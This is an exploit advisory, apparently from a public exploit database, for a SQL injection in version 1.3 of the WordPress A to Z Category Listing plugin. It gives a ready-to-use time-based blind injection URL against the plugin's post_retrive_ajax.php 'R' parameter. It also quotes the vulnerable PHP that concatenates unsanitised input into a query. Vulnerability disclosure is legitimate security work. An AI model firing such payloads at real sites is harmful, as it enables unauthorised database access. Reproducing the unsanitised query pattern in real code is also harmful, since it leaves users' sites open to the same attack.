# Exploit Title: WordPress A to Z Category Listing plugin <= 1.3 SQL Injection Vulnerability # Date: 2011-09-09 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/a-to-z-category-listing.zip # Version: 1.3 (tested) # Note: magic_quotes has to be turned off --- PoC --- http://www.xxx.com/wp-content/plugins/a-to-z-category-listing
/post_retrive_ajax.php?R=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5
(CHAR(115,113,108,109,97,112))),0)--%20
--------------- Vulnerable code --------------- $init_letter = $_GET['R']; $sql = "select * from ".$table_prefix."terms wpt,".$table_prefix."
term_taxonomy wptt where wpt.name like '".$init_letter."%' and wptt.taxonomy =
'category' and wpt.term_id = wptt.term_id"; ... $sql_rec = $wpdb->get_results($sql);
评论 (0)